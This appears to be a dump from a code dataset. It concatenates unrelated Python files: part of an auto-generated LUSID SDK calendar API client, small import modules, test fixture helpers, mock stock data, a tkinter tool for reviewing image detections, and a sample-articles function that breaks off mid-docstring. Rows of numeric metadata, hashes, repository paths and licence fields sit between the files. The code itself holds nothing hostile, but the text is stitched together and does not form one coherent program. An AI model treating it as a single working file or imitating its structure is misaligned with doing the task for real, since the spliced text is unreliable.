        raise ApiValueError("Invalid value for parameter `page` when calling `list_calendars_in_scope`, must conform to the pattern `/^[a-zA-Z0-9\+\/]*={0,3}$/`")  # noqa: E501
    # limit: 1-5000.
    if 'limit' in local_var_params and local_var_params['limit'] > 5000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars_in_scope`, must be a value less than or equal to `5000`")  # noqa: E501
    if 'limit' in local_var_params and local_var_params['limit'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_calendars_in_scope`, must be a value greater than or equal to `1`")  # noqa: E501
    # filter: the regex `^[\s\S]*$` accepts any content (including
    # newlines); the generated length bounds are effectively no-ops.
    if ('filter' in local_var_params and
            len(local_var_params['filter']) > 2147483647):
        raise ApiValueError("Invalid value for parameter `filter` when calling `list_calendars_in_scope`, length must be less than or equal to `2147483647`")  # noqa: E501
    if ('filter' in local_var_params and
            len(local_var_params['filter']) < 0):
        raise ApiValueError("Invalid value for parameter `filter` when calling `list_calendars_in_scope`, length must be greater than or equal to `0`")  # noqa: E501
    if 'filter' in local_var_params and not re.search(r'^[\s\S]*$', local_var_params['filter']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `filter` when calling `list_calendars_in_scope`, must conform to the pattern `/^[\s\S]*$/`")  # noqa: E501

    collection_formats = {}

    # scope is a URL path segment; everything else is a query parameter.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501

    query_params = []
    if 'as_at' in local_var_params:
        query_params.append(('asAt', local_var_params['as_at']))  # noqa: E501
    if 'page' in local_var_params:
        query_params.append(('page', local_var_params['page']))  # noqa: E501
    if 'start' in local_var_params:
        query_params.append(('start', local_var_params['start']))  # noqa: E501
    if 'limit' in local_var_params:
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501
    if 'filter' in local_var_params:
        query_params.append(('filter', local_var_params['filter']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # set the LUSID header (SDK telemetry)
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.11.3192'

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PagedResourceListOfCalendar',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_calendar(self, scope, code, update_calendar_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Update a calendar  # noqa: E501

    Update the calendars WeekendMask, SourceProvider or Properties.
    Delegates to `update_calendar_with_http_info` and returns only the
    deserialised body.  Synchronous by default; pass ``async_req=True``
    to get back a thread whose ``get()`` yields the result.

    >>> thread = api.update_calendar(scope, code, update_calendar_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the request (required)
    :param str code: Code of the request (required)
    :param UpdateCalendarRequest update_calendar_request: The new state of the calendar (required)
    :param _preload_content: if False, the raw urllib3.HTTPResponse is
                             returned without reading/decoding. Default True.
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: Calendar
             If the method is called asynchronously,
             returns the request thread.
    """
    # Request only the payload from the *_with_http_info variant.
    kwargs.update(_return_http_data_only=True)
    return self.update_calendar_with_http_info(scope, code, update_calendar_request, **kwargs)  # noqa: E501
def update_calendar_with_http_info(self, scope, code, update_calendar_request, **kwargs):  # noqa: E501
    """[EXPERIMENTAL] Update a calendar  # noqa: E501

    Update the calendars WeekendMask, SourceProvider or Properties  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_calendar_with_http_info(scope, code, update_calendar_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str scope: Scope of the request (required)
    :param str code: Code of the request (required)
    :param UpdateCalendarRequest update_calendar_request: The new state of the calendar (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(Calendar, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # locals() is snapshotted before any other local is defined, so it
    # holds exactly: self, scope, code, update_calendar_request and kwargs.
    local_var_params = locals()

    # Keyword arguments this endpoint accepts; anything else found in
    # **kwargs is rejected below with an ApiTypeError.
    all_params = ['scope', 'code', 'update_calendar_request']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_calendar" % key
            )
        # Fold recognised kwargs in for uniform lookup below.
        local_var_params[key] = val
    del local_var_params['kwargs']

    # verify the required parameter 'scope' is set
    if ('scope' not in local_var_params or
            local_var_params['scope'] is None):
        raise ApiValueError("Missing the required parameter `scope` when calling `update_calendar`")  # noqa: E501
    # verify the required parameter 'code' is set
    if ('code' not in local_var_params or
            local_var_params['code'] is None):
        raise ApiValueError("Missing the required parameter `code` when calling `update_calendar`")  # noqa: E501
    # verify the required parameter 'update_calendar_request' is set
    if ('update_calendar_request' not in local_var_params or
            local_var_params['update_calendar_request'] is None):
        raise ApiValueError("Missing the required parameter `update_calendar_request` when calling `update_calendar`")  # noqa: E501

    # Client-side mirror of the server constraints: scope and code must be
    # 1-64 characters drawn from [a-zA-Z0-9-_].
    if ('scope' in local_var_params and
            len(local_var_params['scope']) > 64):
        raise ApiValueError("Invalid value for parameter `scope` when calling `update_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if ('scope' in local_var_params and
            len(local_var_params['scope']) < 1):
        raise ApiValueError("Invalid value for parameter `scope` when calling `update_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `update_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if ('code' in local_var_params and
            len(local_var_params['code']) > 64):
        raise ApiValueError("Invalid value for parameter `code` when calling `update_calendar`, length must be less than or equal to `64`")  # noqa: E501
    if ('code' in local_var_params and
            len(local_var_params['code']) < 1):
        raise ApiValueError("Invalid value for parameter `code` when calling `update_calendar`, length must be greater than or equal to `1`")  # noqa: E501
    if 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `update_calendar`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # scope and code are URL path segments.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    # The new calendar state is serialised as the POST body.
    body_params = None
    if 'update_calendar_request' in local_var_params:
        body_params = local_var_params['update_calendar_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501

    # HTTP header `Content-Type` — negotiated from the media types the
    # server accepts for this operation.
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # set the LUSID header (SDK telemetry)
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.11.3192'

    return self.api_client.call_api(
        '/api/calendars/generic/{scope}/{code}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Calendar',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 56.690652
| 553
| 0.629699
| 10,516
| 84,299
| 4.841385
| 0.030905
| 0.053111
| 0.087445
| 0.037398
| 0.978414
| 0.97368
| 0.968279
| 0.962877
| 0.955256
| 0.949933
| 0
| 0.020644
| 0.283432
| 84,299
| 1,486
| 554
| 56.728802
| 0.822187
| 0.391772
| 0
| 0.722656
| 1
| 0.083333
| 0.323011
| 0.065881
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027344
| false
| 0
| 0.00651
| 0
| 0.061198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
745ab8eceda81d4f587ebf21c5db2d4abf2f342f
| 108
|
py
|
Python
|
ChromProcess/Loading/experiment_conditions/__init__.py
|
Will-Robin/ChromProcess
|
05f57a4344e58f844ff8a01a12cf9e47afe4fcc4
|
[
"BSD-3-Clause"
] | null | null | null |
ChromProcess/Loading/experiment_conditions/__init__.py
|
Will-Robin/ChromProcess
|
05f57a4344e58f844ff8a01a12cf9e47afe4fcc4
|
[
"BSD-3-Clause"
] | 1
|
2022-01-21T16:14:05.000Z
|
2022-01-21T16:14:05.000Z
|
ChromProcess/Loading/experiment_conditions/__init__.py
|
Will-Robin/ChromProcess
|
05f57a4344e58f844ff8a01a12cf9e47afe4fcc4
|
[
"BSD-3-Clause"
] | 1
|
2022-01-18T16:17:05.000Z
|
2022-01-18T16:17:05.000Z
|
from .conditions_from_csv import conditions_from_csv
from .conditions_from_toml import conditions_from_toml
| 36
| 54
| 0.907407
| 16
| 108
| 5.625
| 0.3125
| 0.622222
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 55
| 54
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77a4c8c7d77e149ca7fe1824a72b9b02b59a1ba2
| 248
|
py
|
Python
|
dcm_spec_tools/tests/test_utils.py
|
mrbean-bremen/dicom-validator
|
56a6b57346e61e578589143d2752c4fd3f562dfb
|
[
"MIT"
] | 5
|
2016-12-09T03:30:33.000Z
|
2019-07-01T14:06:02.000Z
|
dcm_spec_tools/tests/test_utils.py
|
mrbean-bremen/dicom-validator
|
56a6b57346e61e578589143d2752c4fd3f562dfb
|
[
"MIT"
] | 3
|
2018-04-23T07:16:16.000Z
|
2021-01-24T18:13:48.000Z
|
dcm_spec_tools/tests/test_utils.py
|
mrbean-bremen/dicom-validator
|
56a6b57346e61e578589143d2752c4fd3f562dfb
|
[
"MIT"
] | null | null | null |
import os
def fixture_path():
    """Absolute path of the directory holding the test fixtures."""
    here = os.path.dirname(__file__)
    return os.path.join(here, 'fixtures')


def spec_fixture_path():
    """Path of the DocBook spec fixtures inside the fixture directory."""
    return os.path.join(fixture_path(), 'docbook')


def json_fixture_path():
    """Path of the JSON fixtures inside the fixture directory."""
    return os.path.join(fixture_path(), 'json')
| 17.714286
| 62
| 0.705645
| 36
| 248
| 4.555556
| 0.361111
| 0.335366
| 0.310976
| 0.347561
| 0.628049
| 0.628049
| 0.463415
| 0.463415
| 0
| 0
| 0
| 0
| 0.141129
| 248
| 13
| 63
| 19.076923
| 0.769953
| 0
| 0
| 0
| 0
| 0
| 0.076613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| true
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
77d5e9a71a84b9acb2b370f502e835e0ed42cb1e
| 110
|
py
|
Python
|
rlschool/metamaze/envs/__init__.py
|
HaojieSHI98/RLSchool
|
23c21c8028c8398a94dd7ed7aeb2624dc72f1160
|
[
"Apache-2.0"
] | 169
|
2019-07-15T02:23:54.000Z
|
2021-10-31T08:31:19.000Z
|
rlschool/metamaze/envs/__init__.py
|
HaojieSHI98/RLSchool
|
23c21c8028c8398a94dd7ed7aeb2624dc72f1160
|
[
"Apache-2.0"
] | 23
|
2019-07-22T05:11:13.000Z
|
2021-11-01T04:53:39.000Z
|
rlschool/metamaze/envs/__init__.py
|
HaojieSHI98/RLSchool
|
23c21c8028c8398a94dd7ed7aeb2624dc72f1160
|
[
"Apache-2.0"
] | 48
|
2019-07-15T02:21:42.000Z
|
2021-09-16T06:40:51.000Z
|
from rlschool.metamaze.envs.maze_env import MetaMaze3D
from rlschool.metamaze.envs.maze_env import MetaMaze2D
| 36.666667
| 54
| 0.872727
| 16
| 110
| 5.875
| 0.5625
| 0.255319
| 0.425532
| 0.510638
| 0.787234
| 0.787234
| 0.787234
| 0
| 0
| 0
| 0
| 0.019608
| 0.072727
| 110
| 2
| 55
| 55
| 0.901961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 10
|
77f492600a33570411c1e0d070d99a7237100357
| 5,546
|
py
|
Python
|
pyramid_scaffold/sample_data/__init__.py
|
austincmatteson/pyramid-stocks
|
662a90588db12cf30d59f43278a716fee63d5f74
|
[
"MIT"
] | null | null | null |
pyramid_scaffold/sample_data/__init__.py
|
austincmatteson/pyramid-stocks
|
662a90588db12cf30d59f43278a716fee63d5f74
|
[
"MIT"
] | 3
|
2019-12-26T16:42:54.000Z
|
2021-06-01T22:23:24.000Z
|
pyramid_scaffold/sample_data/__init__.py
|
austincmatteson/pyramid-stocks
|
662a90588db12cf30d59f43278a716fee63d5f74
|
[
"MIT"
] | null | null | null |
# Ticker symbols for the mock entries; every other field is identical
# sample data, so the entries are generated rather than written out ten times.
_SYMBOLS = ["GE", "JE", "KE", "AE", "BE", "CE", "DE", "EE", "FE", "HE"]

# Shared company description used by every mock entry.
_DESCRIPTION = (
    "General Electric Co is a digital industrial company. It operates"
    " in various segments, including power and water, oil and gas,"
    " energy management, aviation, healthcare, transportation,"
    " appliances and lighting, and more."
)

# Mock stock entries used as sample data; identical to ten hand-written
# dicts that differ only in their "symbol" value.
MOCK_ENTRIES = [{
    "symbol": symbol,
    "companyName": "General Electric Company",
    "exchange": "New York Stock Exchange",
    "industry": "Industrial Products",
    "website": "http://www.ge.com",
    "description": _DESCRIPTION,
    "CEO": "John L. Flannery",
    "issueType": "cs",
    "sector": "Industrials"
} for symbol in _SYMBOLS]
| 39.056338
| 74
| 0.62784
| 582
| 5,546
| 5.9811
| 0.103093
| 0.086182
| 0.074691
| 0.0948
| 0.989371
| 0.989371
| 0.989371
| 0.989371
| 0.989371
| 0.989371
| 0
| 0
| 0.231158
| 5,546
| 141
| 75
| 39.333333
| 0.81637
| 0
| 0
| 0.914894
| 0
| 0
| 0.721241
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bb0ec314df060a714405a1b0859235dc8e53699d
| 13,733
|
py
|
Python
|
src/postprocess/display_output.py
|
CMFell/phd_cnn_code
|
cb343bc379f5b06241cead64089a41ae5a6fe167
|
[
"MIT"
] | null | null | null |
src/postprocess/display_output.py
|
CMFell/phd_cnn_code
|
cb343bc379f5b06241cead64089a41ae5a6fe167
|
[
"MIT"
] | null | null | null |
src/postprocess/display_output.py
|
CMFell/phd_cnn_code
|
cb343bc379f5b06241cead64089a41ae5a6fe167
|
[
"MIT"
] | null | null | null |
import cv2
import os
import numpy as np
import pandas as pd
from pathlib import Path
from PIL import Image, ImageTk
import tkinter as tk
def display_single_image_results(image_in, image_filename, res_list):
    """Show one image's detection summary in a Tk window.

    image_in: BGR image array (as produced by cv2.imread).
    image_filename: source image path; its stem becomes the window title.
    res_list: positional results -- [0] true positives, [1] false positives,
              [2] false negatives, [3] csv save path, [4] image save path.
    """
    window = tk.Tk()
    window.title(Path(image_filename).stem)
    height, width, no_channels = image_in.shape
    # OpenCV stores BGR; Tk/PIL expect RGB. Shrink by 8x for display.
    rgb_image = cv2.cvtColor(image_in, cv2.COLOR_BGR2RGB)
    small_size = (int(width / 8), int(height / 8))
    image_sm = cv2.resize(rgb_image, small_size)
    res_string = f'This image contains {res_list[0]} true positives in green, {res_list[1]} false positives in yellow and {res_list[2]} false negatives in red'
    img_string = f'This image is saved at {res_list[4]}'
    csv_string = f'The box locations are saved at {res_list[3]}'
    # One label per line of summary text, stacked top to bottom.
    for message in (res_string, img_string, csv_string):
        tk.Label(window, text=message).pack()
    # Canvas sized to the shrunken image.
    canvas = tk.Canvas(window, width=small_size[0], height=small_size[1])
    canvas.pack()
    # Keep 'photo' referenced until mainloop returns, or Tk drops the image.
    photo = ImageTk.PhotoImage(image=Image.fromarray(image_sm))
    canvas.create_image(0, 0, image=photo, anchor=tk.NW)
    window.mainloop()
def manual_check_single_image(results_loc, image_output_loc):
    """Open the single-image manual review window and block until closed.

    results_loc: path of the detections CSV to review.
    image_output_loc: path of the image the detections belong to.
    """
    window = tk.Tk()
    # Fixed window size matching the button layout of the review frame.
    window.geometry("400x300")
    frame = CheckDetectionWindowsSingleImage(results_loc, image_output_loc, window)
    window.mainloop()
class CheckDetectionWindows(tk.Frame):
    """Tk frame for manually reviewing detections listed in a results CSV.

    Each detection row is shown as a cropped window from its source image;
    the reviewer marks it "Animal" / "Not Animal", can step back one row,
    and saves progress back to the same CSV (columns 'checked' and
    'manual_result').
    """

    def __init__(self, results_path, imagedir, master=None):
        """Load the results CSV, add bookkeeping columns, and build the UI.

        results_path: CSV of detections (needs filename/xmn/xmx/ymn/ymx columns).
        imagedir: directory containing 'pos/' and 'neg/' image subfolders.
        master: parent Tk widget.
        """
        tk.Frame.__init__(self, master)
        self.master = master
        self.results_path = results_path
        gfrc_results = pd.read_csv(self.results_path)
        self.gfrc_results_sort = gfrc_results.sort_values(by='filename')
        # Bookkeeping columns are created on first use so a partially
        # reviewed CSV can be resumed later.
        if 'checked' not in self.gfrc_results_sort.columns:
            self.gfrc_results_sort['checked'] = np.zeros(self.gfrc_results_sort.shape[0])
        if 'manual_result' not in self.gfrc_results_sort.columns:
            self.gfrc_results_sort['manual_result'] = np.repeat("", self.gfrc_results_sort.shape[0])
        self.pos_folder = imagedir + 'pos/'
        self.neg_folder = imagedir + 'neg/'
        self.init_window()

    def _set_result(self, checked, manual_result):
        """Record the review outcome for the row at self.idx.

        Uses positional iloc[row, col] assignment instead of the original
        chained form (df['col'].iloc[i] = v), which pandas may apply to a
        temporary copy and silently drop.
        """
        cols = self.gfrc_results_sort.columns
        self.gfrc_results_sort.iloc[self.idx, cols.get_loc('checked')] = checked
        self.gfrc_results_sort.iloc[self.idx, cols.get_loc('manual_result')] = manual_result

    def _show_current(self):
        """Render the cropped detection at self.idx into the image label.

        This is the display logic that was previously duplicated in
        init_window and all three click handlers.
        """
        # Guard added for robustness (mirrors CheckDetectionWindowsSingleImage):
        # stepping past either end of the table prints instead of raising.
        if self.idx < 0 or self.idx >= self.gfrc_results_sort.shape[0]:
            print("no more detections to check")
            return
        row = self.gfrc_results_sort.iloc[self.idx, :]
        rowimagefile = row.filename
        # Only re-read the source image when the detection is on a new file;
        # the file may live in either the pos/ or the neg/ folder.
        if rowimagefile != self.imagefile:
            rowpath = self.pos_folder + rowimagefile
            if not os.path.isfile(rowpath):
                rowpath = self.neg_folder + rowimagefile
            rowimage = cv2.imread(rowpath)
            self.rowimage = cv2.cvtColor(rowimage, cv2.COLOR_BGR2RGB)
            self.imagefile = rowimagefile
        # Crop the detection box plus a 25px margin, clamped to the image
        # bounds (7360x4912 -- assumed source resolution; TODO confirm).
        rowxmn = max(0, row.xmn - 25)
        rowxmx = min(7360, row.xmx + 25)
        rowymn = max(0, row.ymn - 25)
        rowymx = min(4912, row.ymx + 25)
        rowwindow = self.rowimage[rowymn:rowymx, rowxmn:rowxmx, :]
        render = ImageTk.PhotoImage(Image.fromarray(rowwindow))
        self.imgwindow = tk.Label(self, image=render)
        # Keep a reference on the widget so Tk does not garbage-collect the image.
        self.imgwindow.image = render
        self.imgwindow.place(x=0, y=0)
        # Title the master window with the current source image name.
        self.master.title(self.imagefile)

    def init_window(self):
        """Build the review window, resuming at the first unchecked row."""
        self.imagefile = ""
        self.rowimage = None
        # 'checked' sums to the number of rows already reviewed, which is
        # also the index of the next row to review.
        self.idx = int(np.sum(self.gfrc_results_sort['checked']))
        self._show_current()
        # Let the frame fill the root window.
        self.pack(fill=tk.BOTH, expand=1)
        # Review controls along the bottom of the frame.
        AnimalButton = tk.Button(self, text="Animal", command=self.onClickAnimal)
        NotAnimalButton = tk.Button(self, text="Not Animal", command=self.onClickNot)
        SaveButton = tk.Button(self, text="Save", command=self.onClickSave)
        BackButton = tk.Button(self, text="Back", command=self.onClickBack)
        AnimalButton.place(x=0, y=250)
        NotAnimalButton.place(x=75, y=250)
        SaveButton.place(x=150, y=250)
        BackButton.place(x=225, y=250)

    def onClickAnimal(self):
        """Mark the current detection as an animal and advance to the next."""
        self._set_result(1, "Animal")
        self.idx = self.idx + 1
        self.imgwindow.config(image="")
        self._show_current()

    def onClickNot(self):
        """Mark the current detection as not an animal and advance."""
        self._set_result(1, "Not_Animal")
        self.idx = self.idx + 1
        self.imgwindow.config(image="")
        self._show_current()

    def onClickSave(self):
        """Write review progress back to the results CSV in place."""
        self.gfrc_results_sort.to_csv(self.results_path, index=False)

    def onClickBack(self):
        """Step back one detection and clear its recorded result."""
        self.idx = self.idx - 1
        self._set_result(0, "")
        self.imgwindow.config(image="")
        self._show_current()
class CheckDetectionWindowsSingleImage(tk.Frame):
    """Tk frame for manually reviewing the detections of a single image.

    The whole image is loaded once; each detection row from the results CSV
    is shown as a crop, marked "Animal" / "Not Animal", and progress is
    saved back to the CSV ('checked' and 'manual_result' columns).
    """

    def __init__(self, results_path, image_path, master=None):
        """Load the results CSV and the source image, then build the UI.

        results_path: CSV of detections for this image (xmn/xmx/ymn/ymx/confmat).
        image_path: path of the image the detections belong to.
        master: parent Tk widget.
        """
        tk.Frame.__init__(self, master)
        self.master = master
        self.results_path = results_path
        self.gfrc_results = pd.read_csv(self.results_path)
        # Bookkeeping columns are created on first use so a partially
        # reviewed CSV can be resumed later.
        if 'checked' not in self.gfrc_results.columns:
            self.gfrc_results['checked'] = np.zeros(self.gfrc_results.shape[0])
        if 'manual_result' not in self.gfrc_results.columns:
            self.gfrc_results['manual_result'] = np.repeat("", self.gfrc_results.shape[0])
        image = cv2.imread(image_path)
        # OpenCV loads BGR; convert once for all subsequent crops.
        self.image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        self.init_window()

    def _set_result(self, checked, manual_result):
        """Record the review outcome for the row at self.idx.

        Uses positional iloc[row, col] assignment instead of the original
        chained form (df['col'].iloc[i] = v), which pandas may apply to a
        temporary copy and silently drop.
        """
        cols = self.gfrc_results.columns
        self.gfrc_results.iloc[self.idx, cols.get_loc('checked')] = checked
        self.gfrc_results.iloc[self.idx, cols.get_loc('manual_result')] = manual_result

    def _show_current(self, empty_msg):
        """Render the crop at self.idx, or print empty_msg when none applies.

        Rows flagged 'FN' (false negative) have no detection box to review,
        so they end the pass the same way running off the table does. This
        logic was previously duplicated across init_window and the click
        handlers (onClickBack had no guard at all -- now it does).
        """
        if self.idx < 0 or self.idx >= self.gfrc_results.shape[0]:
            print(empty_msg)
            return
        row = self.gfrc_results.iloc[self.idx, :]
        if row.confmat == 'FN':
            print(empty_msg)
            return
        # Crop the detection box plus a 25px margin, clamped to the image
        # bounds (7360x4912 -- assumed source resolution; TODO confirm).
        rowxmn = max(0, row.xmn - 25)
        rowxmx = min(7360, row.xmx + 25)
        rowymn = max(0, row.ymn - 25)
        rowymx = min(4912, row.ymx + 25)
        rowwindow = self.image[rowymn:rowymx, rowxmn:rowxmx, :]
        render = ImageTk.PhotoImage(Image.fromarray(rowwindow))
        self.imgwindow = tk.Label(self, image=render)
        # Keep a reference on the widget so Tk does not garbage-collect the image.
        self.imgwindow.image = render
        self.imgwindow.place(x=0, y=0)

    def init_window(self):
        """Build the review window, resuming at the first unchecked row."""
        # 'checked' sums to the number of rows already reviewed, which is
        # also the index of the next row to review.
        self.idx = int(np.sum(self.gfrc_results['checked']))
        self._show_current("no detections to check")
        self.master.title("Check Detections")
        # Let the frame fill the root window.
        self.pack(fill=tk.BOTH, expand=1)
        # Review controls along the bottom of the frame.
        AnimalButton = tk.Button(self, text="Animal", command=self.onClickAnimal)
        NotAnimalButton = tk.Button(self, text="Not Animal", command=self.onClickNot)
        SaveButton = tk.Button(self, text="Save", command=self.onClickSave)
        BackButton = tk.Button(self, text="Back", command=self.onClickBack)
        AnimalButton.place(x=0, y=250)
        NotAnimalButton.place(x=75, y=250)
        SaveButton.place(x=150, y=250)
        BackButton.place(x=225, y=250)

    def onClickAnimal(self):
        """Mark the current detection as an animal and advance to the next."""
        # NOTE(review): if no detection was ever displayed, self.imgwindow
        # does not exist and this raises AttributeError -- same as the
        # original behaviour.
        self._set_result(1, "Animal")
        self.idx = self.idx + 1
        self.imgwindow.config(image="")
        self._show_current("no more detections to check")

    def onClickNot(self):
        """Mark the current detection as not an animal and advance."""
        self._set_result(1, "Not_Animal")
        self.idx = self.idx + 1
        self.imgwindow.config(image="")
        self._show_current("no more detections to check")

    def onClickSave(self):
        """Write review progress back to the results CSV in place."""
        self.gfrc_results.to_csv(self.results_path, index=False)

    def onClickBack(self):
        """Step back one detection and clear its recorded result."""
        self.idx = self.idx - 1
        self._set_result(0, "")
        self.imgwindow.config(image="")
        self._show_current("no detections to check")
| 37.936464
| 159
| 0.611156
| 1,739
| 13,733
| 4.72858
| 0.116159
| 0.057522
| 0.07479
| 0.043901
| 0.834245
| 0.8278
| 0.804937
| 0.785845
| 0.761158
| 0.751064
| 0
| 0.027144
| 0.278381
| 13,733
| 361
| 160
| 38.041551
| 0.802624
| 0.073545
| 0
| 0.740458
| 0
| 0.003817
| 0.055963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053435
| false
| 0
| 0.026718
| 0
| 0.087786
| 0.022901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bb172cc3c25555f796a123d656f33c66b487cc0c
| 2,116
|
py
|
Python
|
data.py
|
essien1990/Flask-Mysqldb
|
e0917b90c45a0aaf922bfa672ddb479cb450a02d
|
[
"MIT"
] | null | null | null |
data.py
|
essien1990/Flask-Mysqldb
|
e0917b90c45a0aaf922bfa672ddb479cb450a02d
|
[
"MIT"
] | 6
|
2020-06-05T22:57:03.000Z
|
2021-06-10T18:48:39.000Z
|
data.py
|
essien1990/Flask-Mysqldb
|
e0917b90c45a0aaf922bfa672ddb479cb450a02d
|
[
"MIT"
] | 1
|
2021-12-16T17:09:52.000Z
|
2021-12-16T17:09:52.000Z
|
# Shared placeholder body text; every sample article used an identical copy.
_LOREM_BODY = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.'


def Articles():
    """Return the hard-coded sample articles for the demo app.

    Each article is a dict with keys: id, title, body, author, created_at.
